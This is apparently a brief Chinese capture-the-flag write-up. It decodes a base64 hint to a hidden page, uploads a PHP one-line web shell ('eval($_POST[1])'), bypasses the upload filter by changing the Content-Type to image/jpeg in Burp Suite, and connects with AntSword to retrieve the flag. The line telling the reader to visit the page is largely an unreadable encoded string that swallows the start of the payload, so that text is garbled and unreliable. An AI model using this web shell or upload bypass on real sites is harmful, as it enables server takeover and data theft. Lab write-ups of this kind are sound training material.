点击左上角Hint，如图获取到“aGlkZGVuX3BhZ2UucGhw”；

base64解码后为：hidden_page.php

访问322K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3f1$3k6r3b7#2j5h3c8T1i4K6u0V1x3h3f1#2y4g2)9J5k6o6b7H3k6U0c8Q4x3X3b7^5z5e0R3H3i4K6u0V1z5e0l9&6y4X3q4S2k6X3g2V1k6U0M7&6i4K6u0W2L8X3!0V1k6g2)9J5k6i4m8W2k6r3W2&6i4K6u0W2j5$3!0E0i4K6y4m8z5o6q4Q4x3V1k6Z5K9h3c8V1k6h3&6Q4y4h3k6H3j5h3N6W2i4K6u0W2M7r3S2H3i4@1g2r3i4@1u0o6i4K6S2o6i4@1f1#2i4K6W2o6i4@1p5^5i4@1f1@1i4@1t1^5i4K6S2m8i4@1f1@1i4@1u0o6i4@1p5H3i4@1f1$3i4K6S2q4i4@1p5#2i4@1f1#2i4K6S2r3i4@1p5K6i4@1f1@1i4@1t1^5i4K6S2m8i4@1f1@1i4@1u0o6i4@1p5H3i4@1f1@1i4@1t1^5i4K6R3H3i4@1f1#2i4K6S2r3i4@1p5#2i4@1f1^5i4@1q4r3i4K6W2p5i4@1f1$3i4K6W2o6i4@1p5^5i4@1f1&6i4@1p5&6i4@1q4o6i4K6t1$3L8s2c8Q4x3@1u0Q4x3@1k6H3K9s2l9`. eval($_POST[1]);?>；

通过burpsuite工具拦截上传请求，将Content-Type值改为image/jpeg，即可越过上传限制；

通过蚁剑连接，在根目录获取到flag